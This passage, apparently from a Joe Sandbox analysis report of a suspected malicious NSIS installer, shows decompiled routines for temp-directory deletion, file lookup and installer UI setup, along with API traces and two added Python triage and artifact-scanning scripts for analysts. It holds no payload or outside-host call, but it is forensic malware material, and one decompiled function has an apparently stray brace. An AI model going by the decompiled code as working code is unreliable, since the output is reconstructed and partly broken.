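            "via": int(m["via"], 16) if m["via"] else None,  # address of the subroutine that made the call
        })
    return calls


# Flag rules are this example's own choices: each names a behaviour and matches the call that shows it.
TRIAGE_RULES = (
    ("requests SeShutdownPrivilege",
     lambda c: c["api"] == "LookupPrivilegeValueA" and "SeShutdownPrivilege" in c["args"]),
    ("can reboot the host (ExitWindowsEx; uFlags 2 is EWX_REBOOT)",
     lambda c: c["api"] == "ExitWindowsEx"),
    ("rewrites TEMP/TMP for the process",
     lambda c: c["api"] == "SetEnvironmentVariableA" and bool(c["args"]) and c["args"][0] in ("TEMP", "TMP")),
    ("resolves imports at runtime via GetProcAddress",
     lambda c: c["api"] == "GetProcAddress"),
)


def triage(calls):
    """Summarise a parsed trace: per-API counts, modules touched, and flagged calls in trace order."""
    counts = Counter(c["api"] for c in calls)
    findings = []
    for c in calls:
        for reason, pred in TRIAGE_RULES:
            if pred(c):
                findings.append((reason, c["api"], f'{c["ref"]:08X}'))
    return {
        "counts": counts,
        "modules": sorted({c["module"] for c in calls}),
        "findings": findings,
    }


if __name__ == "__main__":
    result = triage(parse_api_trace(SAMPLE_TRACE))
    for reason, api, ref in result["findings"]:
        print(f"{ref}  {api:<24} {reason}")
```

                The `via` field keeps the subcall attribution, so a GetProcAddress seen inside 004062FD is reported against the caller rather than lost in the flat list; feeding the whole report's API sections through `parse_api_trace` gives one table to pivot on.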

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 272 40572d-405753 call 4059eb 275 405755-405767 DeleteFileA 272->275 276 40576c-405773 272->276 277 4058f6-4058fa 275->277 278 405775-405777 276->278 279 405786-405796 call 405f65 276->279 281 4058a4-4058a9 278->281 282 40577d-405780 278->282 285 4057a5-4057a6 call 405944 279->285 286 405798-4057a3 lstrcatA 279->286 281->277 284 4058ab-4058ae 281->284 282->279 282->281 287 4058b0-4058b6 284->287 288 4058b8-4058c0 call 406268 284->288 289 4057ab-4057ae 285->289 286->289 287->277 288->277 296 4058c2-4058d6 call 4058fd call 4056e5 288->296 292 4057b0-4057b7 289->292 293 4057b9-4057bf lstrcatA 289->293 292->293 295 4057c4-4057e2 lstrlenA FindFirstFileA 292->295 293->295 298 4057e8-4057ff call 405928 295->298 299 40589a-40589e 295->299 308 4058d8-4058db 296->308 309 4058ee-4058f1 call 40508c 296->309 306 405801-405805 298->306 307 40580a-40580d 298->307 299->281 301 4058a0 299->301 301->281 306->307 310 405807 306->310 311 405820-40582e call 405f65 307->311 312 40580f-405814 307->312 308->287 316 4058dd-4058ec call 40508c call 405d44 308->316 309->277 310->307 322 405830-405838 311->322 323 405845-405850 call 4056e5 311->323 313 405816-405818 312->313 314 405879-40588b FindNextFileA 312->314 313->311 318 40581a-40581e 313->318 314->298 320 405891-405894 FindClose 314->320 316->277 318->311 318->314 320->299 322->314 325 40583a-405843 call 40572d 322->325 332 405871-405874 call 40508c 323->332 333 405852-405855 323->333 325->314 332->314 335 405857-405867 call 40508c call 405d44 333->335 336 405869-40586f 333->336 335->314 336->314
                C-Code - Quality: 98%
                			E0040572D(void* __eflags, signed int _a4, signed int _a8) {
                				signed int _v8;
                				void* _v12;
                				signed int _v16;
                				struct _WIN32_FIND_DATAA _v336;
                				signed int _t40;
                				char* _t53;
                				signed int _t55;
                				signed int _t58;
                				signed int _t64;
                				signed int _t66;
                				void* _t68;
                				signed char _t69;
                				CHAR* _t71;
                				void* _t72;
                				CHAR* _t73;
                				char* _t76;
                
                				_t69 = _a8; // flag bits, as tested below: 1 = directory mode, 2 = recurse, 4 = defer failed deletes, 8 = plain DeleteFileA
                				_t73 = _a4; // path to delete; also used as the scratch buffer while enumerating
                				_v8 = _t69 & 0x00000004;
                				_t40 = E004059EB(__eflags, _t73); // path validation; the result is reused at L31 below
                				_v16 = _t40;
                				if((_t69 & 0x00000008) != 0) { // bit 8: single DeleteFileA, with the counter at 0x42f4a8 tracking failures
                					_t66 = DeleteFileA(_t73); // executed
                					asm("sbb eax, eax");
                					_t68 =  ~_t66 + 1;
                					 *0x42f4a8 =  *0x42f4a8 + _t68;
                					return _t68;
                				}
                				_a4 = _t69;
                				_t8 =  &_a4;
                				 *_t8 = _a4 & 0x00000001;
                				__eflags =  *_t8;
                				if( *_t8 == 0) {
                					L5:
                					E00405F65(0x42b878, _t73); // copy the path into the scratch buffer at 0x42b878
                					__eflags = _a4;
                					if(_a4 == 0) {
                						E00405944(_t73);
                					} else {
                						lstrcatA(0x42b878, "\*.*"); // directory mode: enumerate <path>\*.*
                					}
                					__eflags =  *_t73;
                					if( *_t73 != 0) {
                						L10:
                						lstrcatA(_t73, 0x40a014); // append the separator so each entry name can be written at _t71 (end of path)
                						L11:
                						_t71 =  &(_t73[lstrlenA(_t73)]); // executed
                						_t40 = FindFirstFileA(0x42b878,  &_v336); // executed
                						__eflags = _t40 - 0xffffffff;
                						_v12 = _t40;
                						if(_t40 == 0xffffffff) {
                							L29:
                							__eflags = _a4;
                							if(_a4 != 0) {
                								_t32 = _t71 - 1;
                								 *_t32 =  *(_t71 - 1) & 0x00000000;
                								__eflags =  *_t32;
                							}
                							goto L31;
                						} else {
                							goto L12;
                						}
                						do {
                							L12:
                							_t76 =  &(_v336.cFileName);
                							_t53 = E00405928( &(_v336.cFileName), 0x3f); // 0x3f is '?': the ANSI long name could not represent the real name
                							__eflags =  *_t53;
                							if( *_t53 != 0) {
                								__eflags = _v336.cAlternateFileName;
                								if(_v336.cAlternateFileName != 0) {
                									_t76 =  &(_v336.cAlternateFileName); // use the 8.3 name instead
                								}
                							}
                							__eflags =  *_t76 - 0x2e;
                							if( *_t76 != 0x2e) { // 0x2e is '.': the checks below skip the "." and ".." entries
                								L19:
                								E00405F65(_t71, _t76);
                								__eflags = _v336.dwFileAttributes & 0x00000010;
                								if(__eflags == 0) {
                									_t55 = E004056E5(__eflags, _t73, _v8); // delete the file; nonzero = success
                									__eflags = _t55;
                									if(_t55 != 0) {
                										E0040508C(0xfffffff2, _t73);
                									} else {
                										__eflags = _v8 - _t55;
                										if(_v8 == _t55) {
                											 *0x42f4a8 =  *0x42f4a8 + 1; // bit 4 clear: count the failed delete as an error
                										} else {
                											E0040508C(0xfffffff1, _t73);
                											E00405D44(_t72, _t73, 0); // bit 4 set: hand the undeletable file to E00405D44 instead
                										}
                									}
                									}
                								} else {
                									__eflags = (_a8 & 0x00000003) - 3;
                									if(__eflags == 0) { // descend into subdirectories only when bits 1 and 2 are both set
                										E0040572D(__eflags, _t73, _a8);
                									}
                								}
                								goto L27;
                							}
                							_t64 =  *((intOrPtr*)(_t76 + 1));
                							__eflags = _t64;
                							if(_t64 == 0) {
                								goto L27;
                							}
                							__eflags = _t64 - 0x2e;
                							if(_t64 != 0x2e) {
                								goto L19;
                							}
                							__eflags =  *((char*)(_t76 + 2));
                							if( *((char*)(_t76 + 2)) == 0) {
                								goto L27;
                							}
                							goto L19;
                							L27:
                							_t58 = FindNextFileA(_v12,  &_v336); // executed
                							__eflags = _t58;
                						} while (_t58 != 0);
                						_t40 = FindClose(_v12);
                						goto L29;
                					}
                					__eflags =  *0x42b878 - 0x5c;
                					if( *0x42b878 != 0x5c) {
                						goto L11;
                					}
                					goto L10;
                				} else {
                					__eflags = _t40;
                					if(_t40 == 0) {
                						L31:
                						__eflags = _a4;
                						if(_a4 == 0) {
                							L39:
                							return _t40;
                						}
                						__eflags = _v16;
                						if(_v16 != 0) {
                							_t40 = E00406268(_t73);
                							__eflags = _t40;
                							if(_t40 == 0) {
                								goto L39;
                							}
                							E004058FD(_t73);
                							_t40 = E004056E5(__eflags, _t73, _v8 | 0x00000001);
                							__eflags = _t40;
                							if(_t40 != 0) {
                								return E0040508C(0xffffffe5, _t73);
                							}
                							__eflags = _v8;
                							if(_v8 == 0) {
                								goto L33;
                							}
                							E0040508C(0xfffffff1, _t73);
                							return E00405D44(_t72, _t73, 0);
                						}
                						L33:
                						 *0x42f4a8 =  *0x42f4a8 + 1;
                						return _t40;
                					}
                					__eflags = _t69 & 0x00000002;
                					if((_t69 & 0x00000002) == 0) { // directory mode: enumerate the contents only if the path validated and bit 2 is set, otherwise go straight to removing the directory
                						goto L31;
                					}
                					goto L5;
                				}
                			}

                APIs
                • DeleteFileA.KERNELBASE(?,?,772EFA90,C:\Users\user~1\AppData\Local\Temp\,00000000), ref: 00405756
                • lstrcatA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\nsq9535.tmp\*.*,\*.*,C:\Users\user~1\AppData\Local\Temp\nsq9535.tmp\*.*,?,?,772EFA90,C:\Users\user~1\AppData\Local\Temp\,00000000), ref: 0040579E
                • lstrcatA.KERNEL32(?,0040A014,?,C:\Users\user~1\AppData\Local\Temp\nsq9535.tmp\*.*,?,?,772EFA90,C:\Users\user~1\AppData\Local\Temp\,00000000), ref: 004057BF
                • lstrlenA.KERNEL32(?,?,0040A014,?,C:\Users\user~1\AppData\Local\Temp\nsq9535.tmp\*.*,?,?,772EFA90,C:\Users\user~1\AppData\Local\Temp\,00000000), ref: 004057C5
                • FindFirstFileA.KERNELBASE(C:\Users\user~1\AppData\Local\Temp\nsq9535.tmp\*.*,?,?,?,0040A014,?,C:\Users\user~1\AppData\Local\Temp\nsq9535.tmp\*.*,?,?,772EFA90,C:\Users\user~1\AppData\Local\Temp\,00000000), ref: 004057D6
                • FindNextFileA.KERNELBASE(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 00405883
                • FindClose.KERNEL32(00000000), ref: 00405894
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.441917774.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.441899890.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.441946620.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.441966625.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.441966625.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.441966625.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.441966625.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.442087791.000000000044B000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Ptmhbplhxb.jbxd
                Similarity
                • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                • String ID: "C:\Users\user\Desktop\Ptmhbplhxb.exe"$C:\Users\user~1\AppData\Local\Temp\$C:\Users\user~1\AppData\Local\Temp\nsq9535.tmp\*.*$\*.*
                • API String ID: 2035342205-994912435
                • Opcode ID: 5a75186390c9518ef53bc7868eb0b51ef72d35058a64af47be824dbaeb8436d1
                • Instruction ID: 2a0351abb2716448ee460da7bfccfa5d3c7c3698b554042fcfc8e424752a7a40
                • Opcode Fuzzy Hash: 5a75186390c9518ef53bc7868eb0b51ef72d35058a64af47be824dbaeb8436d1
                • Instruction Fuzzy Hash: 2551B132900A04AAEF217B268C45FBF7A78DF42754F14817BF841B61D1D73C8952DEA9
                Uniqueness

                Uniqueness Score: -1.00%
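
                The routine above walks a directory with FindFirstFileA/FindNextFileA and deletes what it finds, and its string list shows the target: the stub's own `...\Temp\nsq9535.tmp` working directory. Anything staged there is gone once that routine has run, so an analyst who wants the dropped files has to look while the installer is still alive, and has to look in the places the entry routine selects for that directory (GetTempPathA, then %SystemRoot%\Temp, then <GetTempPathA>Low). The Python below is an added example, not code from the report or from the sample: it computes those candidate locations from an environment mapping and scans them for directories named like the observed one. The `ns<letter><hex>.tmp` name pattern is generalised from `nsq9535.tmp` and is an assumption; the `~nsu*.tmp` pattern is an assumption based on the `~nsu` string in the first function's string list; `build_demo_layout` creates a constructed tree so the scan can run offline.

```python
import os
import re
import tempfile
from pathlib import Path, PureWindowsPath

# Name pattern generalised from the nsq9535.tmp directory seen in this report;
# the letter-plus-hex-digits layout is this example's assumption, not taken from the page.
NSIS_TMP_DIR_RE = re.compile(r"^ns[a-z][0-9a-f]{1,4}\.tmp$", re.IGNORECASE)
# "~nsu" is one of the stub's strings; treating "~nsu*.tmp" entries as related artifacts is an assumption.
NSIS_UNINST_TMP_RE = re.compile(r"^~nsu[^\\/]*\.tmp$", re.IGNORECASE)


def candidate_temp_dirs(env):
    """Return the locations the stub tries, in the order its entry routine tries them:
    GetTempPath, then %SystemRoot%\\Temp, then <GetTempPath>Low (i.e. <TEMP>\\Low)."""
    temp = env.get("TEMP") or env.get("TMP")
    windir = env.get("SystemRoot") or env.get("windir")
    out = []
    if temp:
        out.append(PureWindowsPath(temp))
    if windir:
        out.append(PureWindowsPath(windir) / "Temp")
    if temp:
        out.append(PureWindowsPath(temp) / "Low")
    return out


def classify_name(name):
    """Label a directory entry name, or return None when it does not look like an NSIS temp artifact."""
    if NSIS_TMP_DIR_RE.match(name):
        return "nsis-temp-dir"
    if NSIS_UNINST_TMP_RE.match(name):
        return "nsis-uninstaller-temp"
    return None


def find_nsis_temp_artifacts(dirs):
    """Scan each directory that exists for matching entries.
    Returns (kind, path, [child names]) tuples sorted by path; missing directories are skipped."""
    hits = []
    for d in dirs:
        root = Path(str(d))
        if not root.is_dir():
            continue
        for entry in root.iterdir():
            kind = classify_name(entry.name)
            if kind is None:
                continue
            children = sorted(p.name for p in entry.iterdir()) if entry.is_dir() else []
            hits.append((kind, entry, children))
    return sorted(hits, key=lambda h: str(h[1]))


def build_demo_layout():
    """Constructed sample tree (not from the sandbox run) so the scan can be exercised offline."""
    root = Path(tempfile.mkdtemp(prefix="nsis-demo-"))
    (root / "nsq9535.tmp").mkdir()
    (root / "nsq9535.tmp" / "dropped.dll").write_bytes(b"MZ")  # placeholder for a staged file
    (root / "~nsuA.tmp").mkdir()
    (root / "unrelated.tmp").mkdir()
    (root / "report.txt").write_text("not an NSIS artifact")
    return root


if __name__ == "__main__":
    # On a live Windows host this checks the real candidate directories; elsewhere they simply do not exist.
    for kind, path, children in find_nsis_temp_artifacts(candidate_temp_dirs(os.environ)):
        print(kind, path, children)
```

                Run it while the installer process is still present, or point `find_nsis_temp_artifacts` at a mounted image of the sandbox disk; once the routine above has finished, only file-system journal or deleted-entry carving will show the directory.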

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 583 406268-40627c FindFirstFileA 584 406289 583->584 585 40627e-406287 FindClose 583->585 586 40628b-40628c 584->586 585->586
                C-Code - Quality: 100%
                			E00406268(CHAR* _a4) {
                				void* _t2;
                
                				_t2 = FindFirstFileA(_a4, 0x42c0c0); // executed
                				if(_t2 == 0xffffffff) {
                					return 0;
                				}
                				FindClose(_t2);
                				return 0x42c0c0;
                			}

                APIs
                • FindFirstFileA.KERNELBASE(772EFA90,0042C0C0,C:\,00405A2E,C:\,C:\,00000000,C:\,C:\,772EFA90,?,C:\Users\user~1\AppData\Local\Temp\,0040574D,?,772EFA90,C:\Users\user~1\AppData\Local\Temp\), ref: 00406273
                • FindClose.KERNEL32(00000000), ref: 0040627F
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.441917774.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.441899890.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.441946620.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.441966625.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.441966625.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.441966625.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.441966625.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.442087791.000000000044B000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Ptmhbplhxb.jbxd
                Similarity
                • API ID: Find$CloseFileFirst
                • String ID: C:\
                • API String ID: 2295610775-3404278061
                • Opcode ID: f33084ac43254253387421f94672507a8f359bb84d60abe7f61aad8f4daa312f
                • Instruction ID: e0279db6a2f9a876ecb4b02bc738002a428a13ad585e0dc9357aaf1afb57e826
                • Opcode Fuzzy Hash: f33084ac43254253387421f94672507a8f359bb84d60abe7f61aad8f4daa312f
                • Instruction Fuzzy Hash: 9DD012365060209FC25027786D0C85B7A589F053317118B7FF8AAF21E0C7348CA386DC
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                control_flow_graph 132 4037b5-4037cd call 4062fd 135 4037e1-403812 call 405e4c 132->135 136 4037cf-4037da GetUserDefaultUILanguage call 405ec3 132->136 142 403814-403825 call 405e4c 135->142 143 40382a-403830 lstrcatA 135->143 139 4037df 136->139 141 403835-40385e call 403a7a call 4059eb 139->141 149 403864-403869 141->149 150 4038e5-4038ed call 4059eb 141->150 142->143 143->141 149->150 152 40386b-40388f call 405e4c 149->152 156 4038fb-403920 LoadImageA 150->156 157 4038ef-4038f6 call 405f87 150->157 152->150 158 403891-403893 152->158 160 4039a1-4039a9 call 40140b 156->160 161 403922-403952 RegisterClassA 156->161 157->156 162 4038a4-4038b0 lstrlenA 158->162 163 403895-4038a2 call 405928 158->163 174 4039b3-4039be call 403a7a 160->174 175 4039ab-4039ae 160->175 164 403a70 161->164 165 403958-40399c SystemParametersInfoA CreateWindowExA 161->165 169 4038b2-4038c0 lstrcmpiA 162->169 170 4038d8-4038e0 call 4058fd call 405f65 162->170 163->162 168 403a72-403a79 164->168 165->160 169->170 173 4038c2-4038cc GetFileAttributesA 169->173 170->150 177 4038d2-4038d3 call 405944 173->177 178 4038ce-4038d0 173->178 184 4039c4-4039de ShowWindow call 40628f 174->184 185 403a47-403a4f call 40515e 174->185 175->168 177->170 178->170 178->177 190 4039e0-4039e5 call 40628f 184->190 191 4039ea-4039fc GetClassInfoA 184->191 192 403a51-403a57 185->192 193 403a69-403a6b call 40140b 185->193 190->191 196 403a14-403a45 DialogBoxParamA call 40140b call 403705 191->196 197 4039fe-403a0e GetClassInfoA RegisterClassA 191->197 192->175 198 403a5d-403a64 call 40140b 192->198 193->164 196->168 197->196 198->175
                C-Code - Quality: 96%
                			E004037B5(void* __eflags) {
                				intOrPtr _v4;
                				intOrPtr _v8;
                				int _v12;
                				void _v16;
                				void* __ebx;
                				void* __edi;
                				void* __esi;
                				intOrPtr* _t17;
                				void* _t25;
                				void* _t27;
                				int _t28;
                				void* _t31;
                				int _t34;
                				int _t35;
                				intOrPtr _t36;
                				int _t39;
                				char _t57;
                				CHAR* _t59;
                				signed char _t63;
                				signed short _t67;
                				CHAR* _t74;
                				intOrPtr _t76;
                				CHAR* _t81;
                
                				_t76 =  *0x42f414;
                				_t17 = E004062FD(2);
                				_t84 = _t17;
                				if(_t17 == 0) {
                					_t74 = 0x42a870;
                					"1033" = 0x30;
                					 *0x436001 = 0x78;
                					 *0x436002 = 0;
                					E00405E4C(_t71, __eflags, 0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x42a870, 0);
                					__eflags =  *0x42a870;
                					if(__eflags == 0) {
                						E00405E4C(_t71, __eflags, 0x80000003, ".DEFAULT\\Control Panel\\International",  &M0040835A, 0x42a870, 0);
                					}
                					lstrcatA("1033", _t74);
                				} else {
                					_t67 =  *_t17(); // executed
                					E00405EC3("1033", _t67 & 0x0000ffff);
                				}
                				E00403A7A(_t71, _t84);
                				 *0x42f4a0 =  *0x42f41c & 0x00000020;
                				 *0x42f4bc = 0x10000;
                				if(E004059EB(_t84, 0x435400) != 0) {
                					L16:
                					if(E004059EB(_t92, 0x435400) == 0) {
                						E00405F87(0, _t74, _t76, 0x435400,  *((intOrPtr*)(_t76 + 0x118)));
                					}
                					_t25 = LoadImageA( *0x42f400, 0x67, 1, 0, 0, 0x8040); // executed
                					 *0x42ebe8 = _t25;
                					if( *((intOrPtr*)(_t76 + 0x50)) == 0xffffffff) {
                						L21:
                						if(E0040140B(0) == 0) {
                							_t27 = E00403A7A(_t71, __eflags);
                							__eflags =  *0x42f4c0;
                							if( *0x42f4c0 != 0) {
                								_t28 = E0040515E(_t27, 0);
                								__eflags = _t28;
                								if(_t28 == 0) {
                									E0040140B(1);
                									goto L33;
                								}
                								__eflags =  *0x42ebcc; // 0x1
                								if(__eflags == 0) {
                									E0040140B(2);
                								}
                								goto L22;
                							}
                							ShowWindow( *0x42a850, 5);
                							_t34 = E0040628F("RichEd20");
                							__eflags = _t34;
                							if(_t34 == 0) {
                								E0040628F("RichEd32");
                							}
                							_t81 = "RichEdit20A";
                							_t35 = GetClassInfoA(0, _t81, 0x42eba0);
                							__eflags = _t35;
                							if(_t35 == 0) {
                								GetClassInfoA(0, "RichEdit", 0x42eba0);
                								 *0x42ebc4 = _t81;
                								RegisterClassA(0x42eba0);
                							}
                							_t36 =  *0x42ebe0; // 0x0
                							_t39 = DialogBoxParamA( *0x42f400, _t36 + 0x00000069 & 0x0000ffff, 0, E00403B52, 0);
                							E00403705(E0040140B(5), 1);
                							return _t39;
                						}
                						L22:
                						_t31 = 2;
                						return _t31;
                					} else {
                						_t71 =  *0x42f400;
                						 *0x42eba4 = E00401000;
                						 *0x42ebb0 =  *0x42f400;
                						 *0x42ebb4 = _t25;
                						 *0x42ebc4 = 0x40a1f4;
                						if(RegisterClassA(0x42eba0) == 0) {
                							L33:
                							__eflags = 0;
                							return 0;
                						}
                						SystemParametersInfoA(0x30, 0,  &_v16, 0);
                						 *0x42a850 = CreateWindowExA(0x80, 0x40a1f4, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x42f400, 0);
                						goto L21;
                					}
                				} else {
                					_t71 =  *(_t76 + 0x48);
                					_t86 = _t71;
                					if(_t71 == 0) {
                						goto L16;
                					}
                					_t74 = 0x42e3a0;
                					E00405E4C(_t71, _t86,  *((intOrPtr*)(_t76 + 0x44)), _t71,  *((intOrPtr*)(_t76 + 0x4c)) +  *0x42f458, 0x42e3a0, 0);
                					_t57 =  *0x42e3a0; // 0x31
                					if(_t57 == 0) {
                						goto L16;
                					}
                					if(_t57 == 0x22) {
                						_t74 = 0x42e3a1;
                						 *((char*)(E00405928(0x42e3a1, 0x22))) = 0;
                					}
                					_t59 = lstrlenA(_t74) + _t74 - 4;
                					if(_t59 <= _t74 || lstrcmpiA(_t59, ?str?) != 0) {
                						L15:
                						E00405F65(0x435400, E004058FD(_t74));
                						goto L16;
                					} else {
                						_t63 = GetFileAttributesA(_t74);
                						if(_t63 == 0xffffffff) {
                							L14:
                							E00405944(_t74);
                							goto L15;
                						}
                						_t92 = _t63 & 0x00000010;
                						if((_t63 & 0x00000010) != 0) {
                							goto L15;
                						}
                						goto L14;
                					}
                				}
                			}

                APIs
                  • Part of subcall function 004062FD: GetModuleHandleA.KERNEL32(?,?,?,00403264,0000000A), ref: 0040630F
                  • Part of subcall function 004062FD: GetProcAddress.KERNEL32(00000000,?), ref: 0040632A
                • GetUserDefaultUILanguage.KERNELBASE(00000002,772EFA90,C:\Users\user~1\AppData\Local\Temp\,"C:\Users\user\Desktop\Ptmhbplhxb.exe",00000000), ref: 004037CF
                  • Part of subcall function 00405EC3: wsprintfA.USER32 ref: 00405ED0
                • lstrcatA.KERNEL32(1033,0042A870,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A870,00000000,00000002,772EFA90,C:\Users\user~1\AppData\Local\Temp\,"C:\Users\user\Desktop\Ptmhbplhxb.exe",00000000), ref: 00403830
                • lstrlenA.KERNEL32(0042E3A0,?,?,?,0042E3A0,00000000,00435400,1033,0042A870,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A870,00000000,00000002,772EFA90), ref: 004038A5
                • lstrcmpiA.KERNEL32(?,.exe,0042E3A0,?,?,?,0042E3A0,00000000,00435400,1033,0042A870,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A870,00000000), ref: 004038B8
                • GetFileAttributesA.KERNEL32(0042E3A0), ref: 004038C3
                • LoadImageA.USER32 ref: 0040390C
                • RegisterClassA.USER32 ref: 00403949
                • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00403961
                • CreateWindowExA.USER32 ref: 00403996
                • ShowWindow.USER32(00000005,00000000), ref: 004039CC
                • GetClassInfoA.USER32 ref: 004039F8
                • GetClassInfoA.USER32 ref: 00403A05
                • RegisterClassA.USER32 ref: 00403A0E
                • DialogBoxParamA.USER32 ref: 00403A2D
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.441917774.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.441899890.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.441946620.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.441966625.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.441966625.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.441966625.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.441966625.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.442087791.000000000044B000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Ptmhbplhxb.jbxd
                Similarity
                • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDefaultDialogFileHandleImageLanguageLoadModuleParamParametersProcShowSystemUserlstrcatlstrcmpilstrlenwsprintf
                • String ID: "C:\Users\user\Desktop\Ptmhbplhxb.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user~1\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                • API String ID: 606308-2846193977
                • Opcode ID: 7c46e95d15e6a007461aada79675e14bbdf31a6050e9bfd56e3caf825b44128a
                • Instruction ID: cf57693f3f88dc886a5042f17341946b18930627488d4c28d640959b633c26bb
                • Opcode Fuzzy Hash: 7c46e95d15e6a007461aada79675e14bbdf31a6050e9bfd56e3caf825b44128a
                • Instruction Fuzzy Hash: 3E61D770240600AED620BB669D45F373EACEB44749F40447EF985B22E2DB7C9D029A2D
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                control_flow_graph 205 402d48-402d96 GetTickCount GetModuleFileNameA call 405afe 208 402da2-402dd0 call 405f65 call 405944 call 405f65 GetFileSize 205->208 209 402d98-402d9d 205->209 217 402dd6 208->217 218 402ebd-402ecb call 402ce4 208->218 210 402f7a-402f7e 209->210 219 402ddb-402df2 217->219 224 402f20-402f25 218->224 225 402ecd-402ed0 218->225 221 402df4 219->221 222 402df6-402dff call 403193 219->222 221->222 231 402e05-402e0c 222->231 232 402f27-402f2f call 402ce4 222->232 224->210 227 402ed2-402eea call 4031a9 call 403193 225->227 228 402ef4-402f1e GlobalAlloc call 4031a9 call 402f81 225->228 227->224 251 402eec-402ef2 227->251 228->224 256 402f31-402f42 228->256 235 402e88-402e8c 231->235 236 402e0e-402e22 call 405ab9 231->236 232->224 240 402e96-402e9c 235->240 241 402e8e-402e95 call 402ce4 235->241 236->240 254 402e24-402e2b 236->254 247 402eab-402eb5 240->247 248 402e9e-402ea8 call 4063b4 240->248 241->240 247->219 255 402ebb 247->255 248->247 251->224 251->228 254->240 260 402e2d-402e34 254->260 255->218 257 402f44 256->257 258 402f4a-402f4f 256->258 257->258 261 402f50-402f56 258->261 260->240 262 402e36-402e3d 260->262 261->261 263 402f58-402f73 SetFilePointer call 405ab9 261->263 262->240 264 402e3f-402e46 262->264 267 402f78 263->267 264->240 266 402e48-402e68 264->266 266->224 268 402e6e-402e72 266->268 267->210 269 402e74-402e78 268->269 270 402e7a-402e82 268->270 269->255 269->270 270->240 271 402e84-402e86 270->271 271->240
                C-Code - Quality: 80%
                			E00402D48(void* __eflags, signed int _a4) {
                				DWORD* _v8;
                				DWORD* _v12;
                				void* _v16;
                				intOrPtr _v20;
                				long _v24;
                				intOrPtr _v28;
                				intOrPtr _v32;
                				intOrPtr _v36;
                				intOrPtr _v40;
                				signed int _v44;
                				long _t43;
                				signed int _t50;
                				void* _t53;
                				void* _t57;
                				intOrPtr* _t59;
                				long _t60;
                				signed int _t65;
                				signed int _t70;
                				signed int _t71;
                				signed int _t77;
                				intOrPtr _t80;
                				long _t82;
                				signed int _t85;
                				signed int _t87;
                				void* _t89;
                				signed int _t90;
                				signed int _t93;
                				void* _t94;
                
                				_t82 = 0;
                				_v12 = 0;
                				_v8 = 0;
                				_t43 = GetTickCount();
                				_t91 = "C:\\Users\\frontdesk\\Desktop\\Ptmhbplhxb.exe";
                				 *0x42f410 = _t43 + 0x3e8;
                				GetModuleFileNameA(0, "C:\\Users\\frontdesk\\Desktop\\Ptmhbplhxb.exe", 0x400);
                				_t89 = E00405AFE(_t91, 0x80000000, 3);
                				_v16 = _t89;
                				 *0x40a018 = _t89;
                				if(_t89 == 0xffffffff) {
                					return "Error launching installer";
                				}
                				_t92 = "C:\\Users\\frontdesk\\Desktop";
                				E00405F65("C:\\Users\\frontdesk\\Desktop", _t91);
                				E00405F65(0x437000, E00405944(_t92));
                				_t50 = GetFileSize(_t89, 0);
                				__eflags = _t50;
                				 *0x42142c = _t50;
                				_t93 = _t50;
                				if(_t50 <= 0) {
                					L24:
                					E00402CE4(1);
                					__eflags =  *0x42f418 - _t82;
                					if( *0x42f418 == _t82) {
                						goto L29;
                					}
                					__eflags = _v8 - _t82;
                					if(_v8 == _t82) {
                						L28:
                						_t53 = GlobalAlloc(0x40, _v24); // executed
                						_t94 = _t53;
